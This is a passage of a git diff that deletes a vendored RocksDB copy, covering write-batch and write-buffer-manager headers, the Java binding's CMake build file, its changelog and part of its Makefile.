-    virtual Status MarkBeginPrepare() {
-      return Status::InvalidArgument("MarkBeginPrepare() handler not defined.");
-    }
-
-    virtual Status MarkEndPrepare(const Slice& xid) {
-      return Status::InvalidArgument("MarkEndPrepare() handler not defined.");
-    }
-
-    virtual Status MarkRollback(const Slice& xid) {
-      return Status::InvalidArgument(
-          "MarkRollbackPrepare() handler not defined.");
-    }
-
-    virtual Status MarkCommit(const Slice& xid) {
-      return Status::InvalidArgument("MarkCommit() handler not defined.");
-    }
-
-    // Continue is called by WriteBatch::Iterate. If it returns false,
-    // iteration is halted. Otherwise, it continues iterating. The default
-    // implementation always returns true.
-    virtual bool Continue();
-  };
-  Status Iterate(Handler* handler) const;
-
-  // Retrieve the serialized version of this batch.
-  const std::string& Data() const { return rep_; }
-
-  // Retrieve data size of the batch.
-  size_t GetDataSize() const { return rep_.size(); }
-
-  // Returns the number of updates in the batch
-  int Count() const;
-
-  // Returns true if PutCF will be called during Iterate
-  bool HasPut() const;
-
-  // Returns true if DeleteCF will be called during Iterate
-  bool HasDelete() const;
-
-  // Returns true if SingleDeleteCF will be called during Iterate
-  bool HasSingleDelete() const;
-
-  // Returns true if DeleteRangeCF will be called during Iterate
-  bool HasDeleteRange() const;
-
-  // Returns true if MergeCF will be called during Iterate
-  bool HasMerge() const;
-
-  // Returns true if MarkBeginPrepare will be called during Iterate
-  bool HasBeginPrepare() const;
-
-  // Returns true if MarkEndPrepare will be called during Iterate
-  bool HasEndPrepare() const;
-
-  // Returns trie if MarkCommit will be called during Iterate
-  bool HasCommit() const;
-
-  // Returns trie if MarkRollback will be called during Iterate
-  bool HasRollback() const;
-
-  using WriteBatchBase::GetWriteBatch;
-  WriteBatch* GetWriteBatch() override { return this; }
-
-  // Constructor with a serialized string object
-  explicit WriteBatch(const std::string& rep);
-
-  WriteBatch(const WriteBatch& src);
-  WriteBatch(WriteBatch&& src);
-  WriteBatch& operator=(const WriteBatch& src);
-  WriteBatch& operator=(WriteBatch&& src);
-
-  // marks this point in the WriteBatch as the last record to
-  // be inserted into the WAL, provided the WAL is enabled
-  void MarkWalTerminationPoint();
-  const SavePoint& GetWalTerminationPoint() const { return wal_term_point_; }
-
-  void SetMaxBytes(size_t max_bytes) override { max_bytes_ = max_bytes; }
-
- private:
-  friend class WriteBatchInternal;
-  friend class LocalSavePoint;
-  SavePoints* save_points_;
-
-  // When sending a WriteBatch through WriteImpl we might want to
-  // specify that only the first x records of the batch be written to
-  // the WAL.
-  SavePoint wal_term_point_;
-
-  // For HasXYZ.  Mutable to allow lazy computation of results
-  mutable std::atomic<uint32_t> content_flags_;
-
-  // Performs deferred computation of content_flags if necessary
-  uint32_t ComputeContentFlags() const;
-
-  // Maximum size of rep_.
-  size_t max_bytes_;
-
- protected:
-  std::string rep_;  // See comment in write_batch.cc for the format of rep_
-
-  // Intentionally copyable
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/write_batch_base.h b/thirdparty/rocksdb/include/rocksdb/write_batch_base.h
deleted file mode 100644
index 3e6d011..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_batch_base.h
+++ /dev/null
@@ -1,125 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <cstddef>
-
-namespace rocksdb {
-
-class Slice;
-class Status;
-class ColumnFamilyHandle;
-class WriteBatch;
-struct SliceParts;
-
-// Abstract base class that defines the basic interface for a write batch.
-// See WriteBatch for a basic implementation and WrithBatchWithIndex for an
-// indexed implemenation.
-class WriteBatchBase {
- public:
-  virtual ~WriteBatchBase() {}
-
-  // Store the mapping "key->value" in the database.
-  virtual Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const Slice& key, const Slice& value) = 0;
-
-  // Variant of Put() that gathers output like writev(2).  The key and value
-  // that will be written to the database are concatenations of arrays of
-  // slices.
-  virtual Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                     const SliceParts& value);
-  virtual Status Put(const SliceParts& key, const SliceParts& value);
-
-  // Merge "value" with the existing value of "key" in the database.
-  // "key->merge(existing, value)"
-  virtual Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const Slice& key, const Slice& value) = 0;
-
-  // variant that takes SliceParts
-  virtual Status Merge(ColumnFamilyHandle* column_family, const SliceParts& key,
-                       const SliceParts& value);
-  virtual Status Merge(const SliceParts& key, const SliceParts& value);
-
-  // If the database contains a mapping for "key", erase it.  Else do nothing.
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const Slice& key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const SliceParts& key);
-  virtual Status Delete(const SliceParts& key);
-
-  // If the database contains a mapping for "key", erase it. Expects that the
-  // key was not overwritten. Else do nothing.
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const Slice& key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key);
-  virtual Status SingleDelete(const SliceParts& key);
-
-  // If the database contains mappings in the range ["begin_key", "end_key"],
-  // erase them. Else do nothing.
-  virtual Status DeleteRange(ColumnFamilyHandle* column_family,
-                             const Slice& begin_key, const Slice& end_key) = 0;
-  virtual Status DeleteRange(const Slice& begin_key, const Slice& end_key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status DeleteRange(ColumnFamilyHandle* column_family,
-                             const SliceParts& begin_key,
-                             const SliceParts& end_key);
-  virtual Status DeleteRange(const SliceParts& begin_key,
-                             const SliceParts& end_key);
-
-  // Append a blob of arbitrary size to the records in this batch. The blob will
-  // be stored in the transaction log but not in any other file. In particular,
-  // it will not be persisted to the SST files. When iterating over this
-  // WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-  // of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-  // encountered in the same order in which they were inserted. The blob will
-  // NOT consume sequence number(s) and will NOT increase the count of the batch
-  //
-  // Example application: add timestamps to the transaction log for use in
-  // replication.
-  virtual Status PutLogData(const Slice& blob) = 0;
-
-  // Clear all updates buffered in this batch.
-  virtual void Clear() = 0;
-
-  // Covert this batch into a WriteBatch.  This is an abstracted way of
-  // converting any WriteBatchBase(eg WriteBatchWithIndex) into a basic
-  // WriteBatch.
-  virtual WriteBatch* GetWriteBatch() = 0;
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  virtual void SetSavePoint() = 0;
-
-  // Remove all entries in this batch (Put, Merge, Delete, PutLogData) since the
-  // most recent call to SetSavePoint() and removes the most recent save point.
-  // If there is no previous call to SetSavePoint(), behaves the same as
-  // Clear().
-  virtual Status RollbackToSavePoint() = 0;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  virtual Status PopSavePoint() = 0;
-
-  // Sets the maximum size of the write batch in bytes. 0 means no limit.
-  virtual void SetMaxBytes(size_t max_bytes) = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h b/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h
deleted file mode 100644
index 856cf4b..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h
+++ /dev/null
@@ -1,100 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBufferManager is for managing memory allocation for one or more
-// MemTables.
-
-#pragma once
-
-#include <atomic>
-#include <cstddef>
-#include "rocksdb/cache.h"
-
-namespace rocksdb {
-
-class WriteBufferManager {
- public:
-  // _buffer_size = 0 indicates no limit. Memory won't be capped.
-  // memory_usage() won't be valid and ShouldFlush() will always return true.
-  // if `cache` is provided, we'll put dummy entries in the cache and cost
-  // the memory allocated to the cache. It can be used even if _buffer_size = 0.
-  explicit WriteBufferManager(size_t _buffer_size,
-                              std::shared_ptr<Cache> cache = {});
-  ~WriteBufferManager();
-
-  bool enabled() const { return buffer_size_ != 0; }
-
-  // Only valid if enabled()
-  size_t memory_usage() const {
-    return memory_used_.load(std::memory_order_relaxed);
-  }
-  size_t mutable_memtable_memory_usage() const {
-    return memory_active_.load(std::memory_order_relaxed);
-  }
-  size_t buffer_size() const { return buffer_size_; }
-
-  // Should only be called from write thread
-  bool ShouldFlush() const {
-    if (enabled()) {
-      if (mutable_memtable_memory_usage() > mutable_limit_) {
-        return true;
-      }
-      if (memory_usage() >= buffer_size_ &&
-          mutable_memtable_memory_usage() >= buffer_size_ / 2) {
-        // If the memory exceeds the buffer size, we trigger more aggressive
-        // flush. But if already more than half memory is being flushed,
-        // triggering more flush may not help. We will hold it instead.
-        return true;
-      }
-    }
-    return false;
-  }
-
-  void ReserveMem(size_t mem) {
-    if (cache_rep_ != nullptr) {
-      ReserveMemWithCache(mem);
-    } else if (enabled()) {
-      memory_used_.fetch_add(mem, std::memory_order_relaxed);
-    }
-    if (enabled()) {
-      memory_active_.fetch_add(mem, std::memory_order_relaxed);
-    }
-  }
-  // We are in the process of freeing `mem` bytes, so it is not considered
-  // when checking the soft limit.
-  void ScheduleFreeMem(size_t mem) {
-    if (enabled()) {
-      memory_active_.fetch_sub(mem, std::memory_order_relaxed);
-    }
-  }
-  void FreeMem(size_t mem) {
-    if (cache_rep_ != nullptr) {
-      FreeMemWithCache(mem);
-    } else if (enabled()) {
-      memory_used_.fetch_sub(mem, std::memory_order_relaxed);
-    }
-  }
-
- private:
-  const size_t buffer_size_;
-  const size_t mutable_limit_;
-  std::atomic<size_t> memory_used_;
-  // Memory that hasn't been scheduled to free.
-  std::atomic<size_t> memory_active_;
-  struct CacheRep;
-  std::unique_ptr<CacheRep> cache_rep_;
-
-  void ReserveMemWithCache(size_t mem);
-  void FreeMemWithCache(size_t mem);
-
-  // No copying allowed
-  WriteBufferManager(const WriteBufferManager&) = delete;
-  WriteBufferManager& operator=(const WriteBufferManager&) = delete;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/CMakeLists.txt b/thirdparty/rocksdb/java/CMakeLists.txt
deleted file mode 100644
index d67896c..0000000
--- a/thirdparty/rocksdb/java/CMakeLists.txt
+++ /dev/null
@@ -1,207 +0,0 @@
-cmake_minimum_required(VERSION 2.6)
-
-set(JNI_NATIVE_SOURCES
-        rocksjni/backupablejni.cc
-        rocksjni/backupenginejni.cc
-        rocksjni/checkpoint.cc
-        rocksjni/clock_cache.cc
-        rocksjni/columnfamilyhandle.cc
-        rocksjni/compaction_filter.cc
-        rocksjni/compaction_options_fifo.cc
-        rocksjni/compaction_options_universal.cc
-        rocksjni/comparator.cc
-        rocksjni/comparatorjnicallback.cc
-        rocksjni/compression_options.cc
-        rocksjni/env.cc
-        rocksjni/env_options.cc
-        rocksjni/filter.cc
-        rocksjni/ingest_external_file_options.cc
-        rocksjni/iterator.cc
-        rocksjni/loggerjnicallback.cc
-        rocksjni/lru_cache.cc
-        rocksjni/memtablejni.cc
-        rocksjni/merge_operator.cc
-        rocksjni/options.cc
-        rocksjni/ratelimiterjni.cc
-        rocksjni/remove_emptyvalue_compactionfilterjni.cc
-        rocksjni/cassandra_compactionfilterjni.cc
-        rocksjni/restorejni.cc
-        rocksjni/rocksdb_exception_test.cc
-        rocksjni/rocksjni.cc
-        rocksjni/slice.cc
-        rocksjni/snapshot.cc
-        rocksjni/sst_file_writerjni.cc
-        rocksjni/statistics.cc
-        rocksjni/statisticsjni.cc
-        rocksjni/table.cc
-        rocksjni/transaction_log.cc
-        rocksjni/ttl.cc
-        rocksjni/write_batch.cc
-        rocksjni/write_batch_test.cc
-        rocksjni/write_batch_with_index.cc
-        rocksjni/writebatchhandlerjnicallback.cc
-)
-
-set(NATIVE_JAVA_CLASSES
-        org.rocksdb.AbstractCompactionFilter
-        org.rocksdb.AbstractComparator
-        org.rocksdb.AbstractImmutableNativeReference
-        org.rocksdb.AbstractNativeReference
-        org.rocksdb.AbstractRocksIterator
-        org.rocksdb.AbstractSlice
-        org.rocksdb.AbstractWriteBatch
-        org.rocksdb.BackupableDBOptions
-        org.rocksdb.BackupEngine
-        org.rocksdb.BackupEngineTest
-        org.rocksdb.BlockBasedTableConfig
-        org.rocksdb.BloomFilter
-        org.rocksdb.Cache
-        org.rocksdb.CassandraCompactionFilter
-        org.rocksdb.CassandraValueMergeOperator
-        org.rocksdb.Checkpoint
-        org.rocksdb.ClockCache
-        org.rocksdb.ColumnFamilyHandle
-        org.rocksdb.ColumnFamilyOptions
-        org.rocksdb.CompactionOptionsFIFO
-        org.rocksdb.CompactionOptionsUniversal
-        org.rocksdb.Comparator
-        org.rocksdb.ComparatorOptions
-        org.rocksdb.CompressionOptions
-        org.rocksdb.DBOptions
-        org.rocksdb.DirectComparator
-        org.rocksdb.DirectSlice
-        org.rocksdb.Env
-        org.rocksdb.EnvOptions
-        org.rocksdb.ExternalSstFileInfo
-        org.rocksdb.Filter
-        org.rocksdb.FlushOptions
-        org.rocksdb.HashLinkedListMemTableConfig
-        org.rocksdb.HashSkipListMemTableConfig
-        org.rocksdb.IngestExternalFileOptions
-        org.rocksdb.Logger
-        org.rocksdb.LRUCache
-        org.rocksdb.MemTableConfig
-        org.rocksdb.MergeOperator
-        org.rocksdb.NativeLibraryLoader
-        org.rocksdb.Options
-        org.rocksdb.PlainTableConfig
-        org.rocksdb.RateLimiter
-        org.rocksdb.ReadOptions
-        org.rocksdb.RemoveEmptyValueCompactionFilter
-        org.rocksdb.RestoreOptions
-        org.rocksdb.RocksDB
-        org.rocksdb.RocksDBExceptionTest
-        org.rocksdb.RocksEnv
-        org.rocksdb.RocksIterator
-        org.rocksdb.RocksIteratorInterface
-        org.rocksdb.RocksMemEnv
-        org.rocksdb.RocksMutableObject
-        org.rocksdb.RocksObject
-        org.rocksdb.SkipListMemTableConfig
-        org.rocksdb.Slice
-        org.rocksdb.Snapshot
-        org.rocksdb.SnapshotTest
-        org.rocksdb.SstFileWriter
-        org.rocksdb.Statistics
-        org.rocksdb.StringAppendOperator
-        org.rocksdb.TableFormatConfig
-        org.rocksdb.TransactionLogIterator
-        org.rocksdb.TtlDB
-        org.rocksdb.VectorMemTableConfig
-        org.rocksdb.WBWIRocksIterator
-        org.rocksdb.WriteBatch
-        org.rocksdb.WriteBatch.Handler
-        org.rocksdb.WriteBatchTest
-        org.rocksdb.WriteBatchTestInternalHelper
-        org.rocksdb.WriteBatchWithIndex
-        org.rocksdb.WriteOptions
-)
-
-include_directories($ENV{JAVA_HOME}/include)
-include_directories($ENV{JAVA_HOME}/include/win32)
-include_directories(${PROJECT_SOURCE_DIR}/java)
-
-set(JAVA_TEST_LIBDIR ${PROJECT_SOURCE_DIR}/java/test-libs)
-set(JAVA_TMP_JAR ${JAVA_TEST_LIBDIR}/tmp.jar)
-set(JAVA_JUNIT_JAR ${JAVA_TEST_LIBDIR}/junit-4.12.jar)
-set(JAVA_HAMCR_JAR ${JAVA_TEST_LIBDIR}/hamcrest-core-1.3.jar)
-set(JAVA_MOCKITO_JAR ${JAVA_TEST_LIBDIR}/mockito-all-1.10.19.jar)
-set(JAVA_CGLIB_JAR ${JAVA_TEST_LIBDIR}/cglib-2.2.2.jar)
-set(JAVA_ASSERTJ_JAR ${JAVA_TEST_LIBDIR}/assertj-core-1.7.1.jar)
-set(JAVA_TESTCLASSPATH "${JAVA_JUNIT_JAR}\;${JAVA_HAMCR_JAR}\;${JAVA_MOCKITO_JAR}\;${JAVA_CGLIB_JAR}\;${JAVA_ASSERTJ_JAR}")
-
-if(NOT EXISTS ${PROJECT_SOURCE_DIR}/java/classes)
-  file(MAKE_DIRECTORY ${PROJECT_SOURCE_DIR}/java/classes)
-endif()
-
-if(NOT EXISTS ${JAVA_TEST_LIBDIR})
-  file(MAKE_DIRECTORY mkdir ${JAVA_TEST_LIBDIR})
-endif()
-
-if (DEFINED CUSTOM_REPO_URL)
-  set(SEARCH_REPO_URL ${CUSTOM_REPO_URL}/)
-  set(CENTRAL_REPO_URL ${CUSTOM_REPO_URL}/)
-else ()
-  set(SEARCH_REPO_URL "http://search.maven.org/remotecontent?filepath=")
-  set(CENTRAL_REPO_URL "http://central.maven.org/maven2/")
-endif()
-
-if(NOT EXISTS ${JAVA_JUNIT_JAR})
-  message("Downloading ${JAVA_JUNIT_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}junit/junit/4.12/junit-4.12.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_JUNIT_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_JUNIT_JAR})
-endif()
-if(NOT EXISTS ${JAVA_HAMCR_JAR})
-  message("Downloading ${JAVA_HAMCR_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_HAMCR_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_HAMCR_JAR})
-endif()
-if(NOT EXISTS ${JAVA_MOCKITO_JAR})
-  message("Downloading ${JAVA_MOCKITO_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_MOCKITO_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_MOCKITO_JAR})
-endif()
-if(NOT EXISTS ${JAVA_CGLIB_JAR})
-  message("Downloading ${JAVA_CGLIB_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}cglib/cglib/2.2.2/cglib-2.2.2.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_CGLIB_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_CGLIB_JAR})
-endif()
-if(NOT EXISTS ${JAVA_ASSERTJ_JAR})
-  message("Downloading ${JAVA_ASSERTJ_JAR}")
-  file(DOWNLOAD ${CENTRAL_REPO_URL}org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_ASSERTJ_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_ASSERTJ_JAR})
-endif()
-
-if(WIN32)
-  set(JAVAC cmd /c javac)
-  set(JAVAH cmd /c javah)
-else()
-  set(JAVAC javac)
-  set(JAVAH javah)
-endif()
-
-execute_process(COMMAND ${JAVAC} ${JAVAC_ARGS} -cp ${JAVA_TESTCLASSPATH} -d ${PROJECT_SOURCE_DIR}/java/classes ${PROJECT_SOURCE_DIR}/java/src/main/java/org/rocksdb/util/*.java ${PROJECT_SOURCE_DIR}/java/src/main/java/org/rocksdb/*.java ${PROJECT_SOURCE_DIR}/java/src/test/java/org/rocksdb/*.java)
-execute_process(COMMAND ${JAVAH} -cp ${PROJECT_SOURCE_DIR}/java/classes -d ${PROJECT_SOURCE_DIR}/java/include -jni ${NATIVE_JAVA_CLASSES})
-add_library(rocksdbjni${ARTIFACT_SUFFIX} SHARED ${JNI_NATIVE_SOURCES})
-set_target_properties(rocksdbjni${ARTIFACT_SUFFIX} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/rocksdbjni${ARTIFACT_SUFFIX}.pdb")
-target_link_libraries(rocksdbjni${ARTIFACT_SUFFIX} rocksdb${ARTIFACT_SUFFIX} ${LIBS})
diff --git a/thirdparty/rocksdb/java/HISTORY-JAVA.md b/thirdparty/rocksdb/java/HISTORY-JAVA.md
deleted file mode 100644
index 731886a..0000000
--- a/thirdparty/rocksdb/java/HISTORY-JAVA.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# RocksJava Change Log
-
-## 3.13 (8/4/2015)
-### New Features
-* Exposed BackupEngine API.
-* Added CappedPrefixExtractor support.  To use such extractor, simply call useCappedPrefixExtractor in either Options or ColumnFamilyOptions.
-* Added RemoveEmptyValueCompactionFilter.
-
-## 3.10.0 (3/24/2015)
-### New Features
-* Added compression per level API.
-* MemEnv is now available in RocksJava via RocksMemEnv class.
-* lz4 compression is now included in rocksjava static library when running `make rocksdbjavastatic`.
-
-### Public API Changes
-* Overflowing a size_t when setting rocksdb options now throws an IllegalArgumentException, which removes the necessity for a developer to catch these Exceptions explicitly.
-* The set and get functions for tableCacheRemoveScanCountLimit are deprecated.
-
-
-## By 01/31/2015
-### New Features
-* WriteBatchWithIndex support.
-* Iterator support for WriteBatch and WriteBatchWithIndex
-* GetUpdatesSince support.
-* Snapshots carry now information about the related sequence number.
-* TTL DB support.
-
-## By 11/14/2014
-### New Features
-* Full support for Column Family.
-* Slice and Comparator support.
-* Default merge operator support.
-* RateLimiter support.
-
-## By 06/15/2014
-### New Features
-* Added basic Java binding for rocksdb::Env such that multiple RocksDB can share the same thread pool and environment.
-* Added RestoreBackupableDB
-
-## By 05/30/2014
-### Internal Framework Improvement
-* Added disOwnNativeHandle to RocksObject, which allows a RocksObject to give-up the ownership of its native handle.  This method is useful when sharing and transferring the ownership of RocksDB C++ resources.
-
-## By 05/15/2014
-### New Features
-* Added RocksObject --- the base class of all RocksDB classes which holds some RocksDB resources in the C++ side.
-* Use environmental variable JAVA_HOME in Makefile for RocksJava
-### Public API changes
-* Renamed org.rocksdb.Iterator to org.rocksdb.RocksIterator to avoid potential confliction with Java built-in Iterator.
-
-## By 04/30/2014
-### New Features
-* Added Java binding for MultiGet.
-* Added static method RocksDB.loadLibrary(), which loads necessary library files.
-* Added Java bindings for 60+ rocksdb::Options.
-* Added Java binding for BloomFilter.
-* Added Java binding for ReadOptions.
-* Added Java binding for memtables.
-* Added Java binding for sst formats.
-* Added Java binding for RocksDB Iterator which enables sequential scan operation.
-* Added Java binding for Statistics
-* Added Java binding for BackupableDB.
-
-### DB Benchmark
-* Added filluniquerandom, readseq benchmark.
-* 70+ command-line options.
-* Enabled BloomFilter configuration.
-
-## By 04/15/2014
-### New Features
-* Added Java binding for WriteOptions.
-* Added Java binding for WriteBatch, which enables batch-write.
-* Added Java binding for rocksdb::Options.
-* Added Java binding for block cache.
-* Added Java version DB Benchmark.
-
-### DB Benchmark
-* Added readwhilewriting benchmark.
-
-### Internal Framework Improvement
-* Avoid a potential byte-array-copy between c++ and Java in RocksDB.get.
-* Added SizeUnit in org.rocksdb.util to store consts like KB and GB.
-
-### 03/28/2014
-* RocksJava project started.
-* Added Java binding for RocksDB, which supports Open, Close, Get and Put.
diff --git a/thirdparty/rocksdb/java/Makefile b/thirdparty/rocksdb/java/Makefile
deleted file mode 100644
index b29447b..0000000
--- a/thirdparty/rocksdb/java/Makefile
+++ /dev/null
@@ -1,231 +0,0 @@
-NATIVE_JAVA_CLASSES = org.rocksdb.AbstractCompactionFilter\
-	org.rocksdb.AbstractComparator\
-	org.rocksdb.AbstractSlice\
-	org.rocksdb.BackupEngine\
-	org.rocksdb.BackupableDBOptions\
-	org.rocksdb.BlockBasedTableConfig\
-	org.rocksdb.BloomFilter\
-	org.rocksdb.Checkpoint\
-	org.rocksdb.ClockCache\
-	org.rocksdb.CassandraCompactionFilter\
-	org.rocksdb.CassandraValueMergeOperator\
-	org.rocksdb.ColumnFamilyHandle\
-	org.rocksdb.ColumnFamilyOptions\
-	org.rocksdb.CompactionOptionsFIFO\
-	org.rocksdb.CompactionOptionsUniversal\
-	org.rocksdb.Comparator\
-	org.rocksdb.ComparatorOptions\
-	org.rocksdb.CompressionOptions\
-	org.rocksdb.DBOptions\
-	org.rocksdb.DirectComparator\
-	org.rocksdb.DirectSlice\
-	org.rocksdb.Env\
-	org.rocksdb.EnvOptions\
-	org.rocksdb.FlushOptions\
-	org.rocksdb.Filter\
-	org.rocksdb.IngestExternalFileOptions\
-	org.rocksdb.HashLinkedListMemTableConfig\
-	org.rocksdb.HashSkipListMemTableConfig\
-	org.rocksdb.Logger\
-	org.rocksdb.LRUCache\
-	org.rocksdb.MergeOperator\
-	org.rocksdb.Options\
-	org.rocksdb.PlainTableConfig\
-	org.rocksdb.RateLimiter\
-	org.rocksdb.ReadOptions\
-	org.rocksdb.RemoveEmptyValueCompactionFilter\
-	org.rocksdb.RestoreOptions\
-	org.rocksdb.RocksDB\
-	org.rocksdb.RocksEnv\
-	org.rocksdb.RocksIterator\
-	org.rocksdb.RocksMemEnv\
-	org.rocksdb.SkipListMemTableConfig\
-	org.rocksdb.Slice\
-	org.rocksdb.SstFileWriter\
-	org.rocksdb.Statistics\
-	org.rocksdb.TransactionLogIterator\
-	org.rocksdb.TtlDB\
-	org.rocksdb.VectorMemTableConfig\
-	org.rocksdb.Snapshot\
-	org.rocksdb.StringAppendOperator\
-	org.rocksdb.WriteBatch\
-	org.rocksdb.WriteBatch.Handler\
-	org.rocksdb.WriteOptions\
-	org.rocksdb.WriteBatchWithIndex\
-	org.rocksdb.WBWIRocksIterator
-
-NATIVE_JAVA_TEST_CLASSES = org.rocksdb.RocksDBExceptionTest\
-    org.rocksdb.WriteBatchTest\
-    org.rocksdb.WriteBatchTestInternalHelper
-
-ROCKSDB_MAJOR = $(shell egrep "ROCKSDB_MAJOR.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_MINOR = $(shell egrep "ROCKSDB_MINOR.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_PATCH = $(shell egrep "ROCKSDB_PATCH.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-
-NATIVE_INCLUDE = ./include
-ARCH := $(shell getconf LONG_BIT)
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux$(ARCH).jar
-ifeq ($(PLATFORM), OS_MACOSX)
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar
-endif
-
-JAVA_TESTS = org.rocksdb.BackupableDBOptionsTest\
-	org.rocksdb.BackupEngineTest\
-	org.rocksdb.BlockBasedTableConfigTest\
-	org.rocksdb.util.BytewiseComparatorTest\
-	org.rocksdb.CheckPointTest\
-	org.rocksdb.ClockCacheTest\
-	org.rocksdb.ColumnFamilyOptionsTest\
-	org.rocksdb.ColumnFamilyTest\
-	org.rocksdb.CompactionOptionsFIFOTest\
-	org.rocksdb.CompactionOptionsUniversalTest\
-	org.rocksdb.CompactionPriorityTest\
-	org.rocksdb.CompactionStopStyleTest\
-	org.rocksdb.ComparatorOptionsTest\
-	org.rocksdb.ComparatorTest\
-	org.rocksdb.CompressionOptionsTest\
-	org.rocksdb.CompressionTypesTest\
-	org.rocksdb.DBOptionsTest\
-	org.rocksdb.DirectComparatorTest\
-	org.rocksdb.DirectSliceTest\
-	org.rocksdb.EnvOptionsTest\
-	org.rocksdb.IngestExternalFileOptionsTest\
-	org.rocksdb.util.EnvironmentTest\
-	org.rocksdb.FilterTest\
-	org.rocksdb.FlushTest\
-	org.rocksdb.InfoLogLevelTest\
-	org.rocksdb.KeyMayExistTest\
-	org.rocksdb.LoggerTest\
-    org.rocksdb.LRUCacheTest\
-	org.rocksdb.MemTableTest\
-	org.rocksdb.MergeTest\
-	org.rocksdb.MixedOptionsTest\
-	org.rocksdb.MutableColumnFamilyOptionsTest\
-	org.rocksdb.NativeLibraryLoaderTest\
-	org.rocksdb.OptionsTest\
-	org.rocksdb.PlainTableConfigTest\
-	org.rocksdb.RateLimiterTest\
-	org.rocksdb.ReadOnlyTest\
-	org.rocksdb.ReadOptionsTest\
-	org.rocksdb.RocksDBTest\
-	org.rocksdb.RocksDBExceptionTest\
-	org.rocksdb.RocksEnvTest\
-	org.rocksdb.RocksIteratorTest\
-	org.rocksdb.RocksMemEnvTest\
-	org.rocksdb.util.SizeUnitTest\
-	org.rocksdb.SliceTest\
-	org.rocksdb.SnapshotTest\
-	org.rocksdb.SstFileWriterTest\
-	org.rocksdb.TransactionLogIteratorTest\
-	org.rocksdb.TtlDBTest\
-	org.rocksdb.StatisticsTest\
-	org.rocksdb.StatisticsCollectorTest\
-	org.rocksdb.WALRecoveryModeTest\
-	org.rocksdb.WriteBatchHandlerTest\
